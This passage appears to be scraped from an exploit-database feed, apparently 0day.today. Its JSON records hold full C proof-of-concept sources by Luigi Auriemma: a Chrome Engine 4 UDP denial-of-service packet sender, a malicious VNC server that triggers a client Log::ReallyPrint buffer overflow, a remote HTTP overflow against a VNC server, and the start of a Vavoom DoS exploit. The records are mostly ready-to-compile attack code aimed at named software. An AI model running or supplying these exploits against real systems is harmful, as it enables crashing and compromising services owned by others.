quit;\r\n if((ret / 100) != 2) delperm = 0; //goto quit; // don't check it because it's not important\r\n }\r\n }\r\n res = 0;\r\n quit:\r\n if(res < 0) printf(\"\\nError: something wrong in the communication with the server\\n\");\r\n close(sd);\r\n args->done = 1;\r\n return(res);\r\n}\r\n\r\n\r\n\r\nint delimit(u8 *data) {\r\n u8 *p;\r\n\r\n for(p = data; *p && (*p != '\\r') && (*p != '\\n'); p++);\r\n *p = 0;\r\n return(p - data);\r\n}\r\n\r\n\r\n\r\nint conna(struct sockaddr_in *peer) {\r\n struct linger ling = {1,1};\r\n int sd;\r\n\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n return(sd);\r\n}\r\n\r\n\r\n\r\nint get_ftp_port(u8 *buff, u32 *ipx) {\r\n u32 ip;\r\n int n1, n2, n3, n4, n5, n6,\r\n port;\r\n u8 *p;\r\n\r\n p = strrchr(buff, '(');\r\n if(!p) return(-1);\r\n if(sscanf(p + 1, \"%d,%d,%d,%d,%d,%d\", &n1, &n2, &n3, &n4, &n5, &n6) != 6) return(-1);\r\n ip = htonl((n1 << 24) | (n2 << 16) | (n3 << 8) | (n4));\r\n if((ip == INADDR_ANY) || (ip == INADDR_NONE)) {\r\n if(ipx) ip = *ipx;\r\n }\r\n if(ipx) *ipx = ip;\r\n port = (n5 << 8) | (n6);\r\n return(port);\r\n}\r\n\r\n\r\n\r\nint recv_ftp(int sd, u8 **rbuff) {\r\n static int buffsz = 0;\r\n static u8 *buff = NULL;\r\n int i,\r\n n,\r\n ret;\r\n\r\n do {\r\n for(i = 0;; i++) {\r\n if(i >= buffsz) {\r\n buffsz += 1024;\r\n buff = realloc(buff, buffsz + 1);\r\n if(!buff) std_err();\r\n }\r\n if(timeout(sd, 5) < 0) return(-1);\r\n if(recv(sd, buff + i, 1, 0) <= 0) return(-1);\r\n if(buff[i] == '\\n') break;\r\n }\r\n buff[i] = 0;\r\n delimit(buff);\r\n if(debug) printf(\" %s\\n\", buff);\r\n if(sscanf(buff, \"%d%n\", &ret, &n) != 1) return(-1);\r\n } while(buff[n] == '-');\r\n if(rbuff) *rbuff = buff;\r\n return(ret);\r\n}\r\n\r\n\r\n\r\nint send_ftp(int sd, u8 *cmd, u8 *arg) {\r\n static int buffsz = 0;\r\n static u8 *buff = NULL;\r\n int len;\r\n\r\n if(!arg) arg = \"\";\r\n len = strlen(cmd) + 1 + strlen(arg) + 2;\r\n if(len >= buffsz) {\r\n buffsz = len + 256;\r\n buff = realloc(buff, buffsz + 1);\r\n if(!buff) std_err();\r\n }\r\n len = sprintf(buff, \"%s %s\\r\\n\", cmd, arg);\r\n if(debug) printf(\"- %s\", buff);\r\n if(send(sd, buff, len, 0) <= 0) return(-1);\r\n return(len);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18886"}, {"lastseen": "2018-04-14T13:53:34", "references": [], "description": "Exploit for windows platform in category dos / poc", "edition": 2, "reporter": "Luigi Auriemma", "published": "2012-06-27T00:00:00", "title": "Chrome Engine 4 Denial of Service 0.1", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-14T13:53:34", "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:N/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-06-27T00:00:00", "id": "1337DAY-ID-18876", "href": "https://0day.today/exploit/description/18876", "sourceData": "----------------\r\n\r\n chromerda.c\r\n\r\n----------------\r\n\r\n/*\r\n by Luigi Auriemma\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n #define waitms(x) sleep(x)\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n #define stristr strcasestr\r\n #define stricmp strcasecmp\r\n #define waitms(x) sleep(x * 1000)\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 27632\r\n#define BUFFSZ 1400\r\n\r\n\r\n\r\nvoid chrome_hash(u8 *data, int len);\r\nint udp_sock(void);\r\nint putxx(u8 *data, u32 num, int bits);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct sockaddr_in peer;\r\n int sd;\r\n u16 port = PORT;\r\n u8 buff[BUFFSZ],\r\n *host,\r\n *p;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"Chrome Engine 4 Denial of Service \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 2) {\r\n printf(\"\\n\"\r\n \"Usage: %s <host> [port(%d)]>\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n host = argv[1];\r\n if(argc > 2) port = atoi(argv[2]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\",\r\n inet_ntoa(peer.sin_addr), port);\r\n\r\n sd = udp_sock();\r\n\r\n p = buff;\r\n p += putxx(p, 28, 8); // other types of packets: 23, 38 (nop), 64, 67\r\n p += putxx(p, (-0x6f) - 5, 32); // this is caused by wrong crc\r\n //p += putcc(p, 'A', (BUFFSZ - 2) - 5); // not needed since the crash is in malloc\r\n p += putxx(p, 0, 16); // the WRONG crc\r\n if(sendto(sd, buff, p - buff, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in))\r\n < 0) std_err();\r\n fputc('.', stdout);\r\n\r\n printf(\"\\n- done, check the server manually\\n\");\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\n// the correct hash function plus the automatic adjusting of the size value\r\nvoid chrome_hash(u8 *data, int len) {\r\n int i;\r\n u16 crc = 1735;\r\n\r\n putxx(data + 1, len - 5, 32);\r\n for(i = 0; i < len; i++) {\r\n crc += (signed char)data[i];\r\n }\r\n data[i] = crc;\r\n data[i+1] = crc >> 8;\r\n}\r\n\r\n\r\n\r\nint udp_sock(void) {\r\n static struct linger ling = {1,1};\r\n static int on = 1;\r\n int sd;\r\n\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n setsockopt(sd, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on));\r\n return(sd);\r\n}\r\n\r\n\r\n\r\nint putxx(u8 *data, u32 num, int bits) {\r\n int i,\r\n bytes;\r\n\r\n bytes = bits >> 3;\r\n for(i = 0; i < bytes; i++) {\r\n //data[i] = (num >> ((bytes - 1 - i) << 3));\r\n data[i] = (num >> (i << 3));\r\n }\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n----------------\r\n winerr.h\r\n\r\n----------------\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18876"}, {"lastseen": "2018-01-11T01:21:29", "references": [], "description": "Exploit for unknown platform in category dos / poc", "edition": 2, "reporter": "Luigi Auriemma", "published": "2006-04-04T00:00:00", "title": "[email\u00a0protected] <= 1.0.1 client Log::ReallyPrint Buffer Overflow PoC", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-11T01:21:29", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-04-04T00:00:00", "id": "1337DAY-ID-6124", "href": "https://0day.today/exploit/description/6124", "sourceData": "=============================================================\r\n[email\u00a0protected] <= 1.0.1 client Log::ReallyPrint Buffer Overflow PoC\r\n=============================================================\r\n\r\n\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n #define close closesocket\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n#endif\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 5900\r\n#define BOFSZ 1024\r\n#define HEAD \"RFB 003.006\\n\"\r\n\r\n\r\n\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct sockaddr_in peerl;\r\n u_int seed;\r\n int sdl,\r\n sd,\r\n len,\r\n on = 1,\r\n psz;\r\n u_char buff[4096];\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"[email\u00a0protected] <= 1.0.1 client Log::ReallyPrint buffer-overflow \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: http://aluigi.altervista.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n peerl.sin_addr.s_addr = INADDR_ANY;\r\n peerl.sin_port = htons(PORT);\r\n peerl.sin_family = AF_INET;\r\n\r\n printf(\"- bind port %hu\\n\", PORT);\r\n sdl = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sdl < 0) std_err();\r\n if(setsockopt(sdl, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))\r\n < 0) std_err();\r\n if(bind(sdl, (struct sockaddr *)&peerl, sizeof(peerl))\r\n < 0) std_err();\r\n if(listen(sdl, SOMAXCONN)\r\n < 0) std_err();\r\n\r\n psz = sizeof(peerl);\r\n seed = time(NULL);\r\n\r\n fputs(\"- clients:\\n\", stdout);\r\n for(;;) {\r\n sd = accept(sdl, (struct sockaddr *)&peerl, &psz);\r\n if(sd < 0) std_err();\r\n\r\n printf(\" %s:%hu\\n\",\r\n inet_ntoa(peerl.sin_addr), ntohs(peerl.sin_port));\r\n\r\n // this is only a simple PoC, so no threads and no checks\r\n if(send(sd, HEAD, sizeof(HEAD) - 1, 0) <= 0) goto quit;\r\n\r\n len = recv(sd, buff, 12, 0); // no need to check real recv\r\n if(len <= 0) goto quit;\r\n\r\n *(u_int *)buff = htonl(0); // connection failed\r\n *(u_int *)(buff + 4) = htonl(BOFSZ); // size of the error\r\n memset(buff + 8, 'A', BOFSZ); // error\r\n if(send(sd, buff, 8 + BOFSZ, 0) <= 0) goto quit;\r\n\r\nquit:\r\n close(sd);\r\n }\r\n\r\n close(sdl);\r\n return(0);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6124"}, {"lastseen": "2018-04-06T03:35:48", "references": [], "description": "Exploit for unknown platform in category dos / poc", "edition": 2, "reporter": "Luigi Auriemma", "published": "2006-04-04T00:00:00", "title": "[email\u00a0protected] <= 1.0.1 VNCLog::ReallyPrint Remote Buffer Overflow PoC", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-06T03:35:48", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-04-04T00:00:00", "id": "1337DAY-ID-6123", "href": "https://0day.today/exploit/description/6123", "sourceData": "================================================================\r\n[email\u00a0protected] <= 1.0.1 VNCLog::ReallyPrint Remote Buffer Overflow PoC\r\n================================================================\r\n\r\n\r\n\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n #define close closesocket\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 5800\r\n#define BOFSZ 1024\r\n\r\n\r\n\r\nint create_rand_string(u_char *data, int len, u_int *seed);\r\nu_int resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct sockaddr_in peer;\r\n u_int seed;\r\n int sd,\r\n i,\r\n len;\r\n u_short port = PORT;\r\n u_char buff[4096];\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"U[email\u00a0protected] <= 1.0.1 VNCLog::ReallyPrint bug \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: http://aluigi.altervista.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 2) {\r\n printf(\"\\n\"\r\n \"Usage: %s <host> [port(%hu)]\\n\"\r\n \"\\n\"\r\n \"Note: although the bug is a buffer-overflow, I have found only a limited way\\n\"\r\n \" (something like an off-by-one) to exploit it versus the server\\n\"\r\n \" Note also that in some cases (for example where it has not been\\n\"\r\n \" configured yet or the logging function has been never enabled) the server\\n\"\r\n \" will not crash\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n seed = time(NULL);\r\n\r\n if(argc > 2) port = atoi(argv[2]);\r\n peer.sin_addr.s_addr = resolv(argv[1]);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\",\r\n inet_ntoa(peer.sin_addr), port);\r\n\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n\r\n printf(\"- connect...\");\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n printf(\" done\\n\");\r\n\r\n len = sprintf(buff, \"GET /\");\r\n len += create_rand_string(buff + len, BOFSZ, &seed);\r\n len += sprintf(buff + len, \" \\r\\n\\r\\n\");\r\n\r\n printf(\"- send BOF HTTP request\\n\");\r\n if(send(sd, buff, len, 0)\r\n < 0) std_err();\r\n\r\n printf(\"- wait some seconds\\n\");\r\n for(i = 3; i >= 0; i--) {\r\n printf(\"%3d\\r\", i);\r\n sleep(ONESEC);\r\n }\r\n\r\n close(sd);\r\n printf(\"- finished, check it manually\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint create_rand_string(u_char *data, int len, u_int *seed) {\r\n u_int rnd;\r\n u_char *p = data;\r\n const static u_char table[] =\r\n \"0123456789\"\r\n \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n \"abcdefghijklmnopqrstuvwxyz\";\r\n\r\n rnd = *seed;\r\n\r\n while(len--) {\r\n rnd = (rnd * 0x343FD) + 0x269EC3;\r\n rnd >>= 3;\r\n *p++ = table[rnd % (sizeof(table) - 1)];\r\n }\r\n *p = 0;\r\n\r\n *seed = rnd;\r\n return(p - data);\r\n}\r\n\r\n\r\n\r\nu_int resolv(char *host) {\r\n struct hostent *hp;\r\n u_int host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u_int *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n# 0day.today [2018-04-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6123"}, {"lastseen": "2018-04-07T23:43:30", "references": [], "description": "Exploit for unknown platform in category dos / poc", "edition": 2, "reporter": "Luigi Auriemma", "published": "2006-03-26T00:00:00", "title": "Vavoom <= 1.19.1 [Multiple Vulnerabilities] Denial of Service Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-07T23:43:30", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-03-26T00:00:00", "id": "1337DAY-ID-6116", "href": "https://0day.today/exploit/description/6116", "sourceData": "=====================================================================\r\nVavoom <= 1.19.1 [Multiple Vulnerabilities] Denial of Service Exploit\r\n=====================================================================\r\n\r\n\r\n\r\n\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <time.h>\r\n#include <zlib.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by 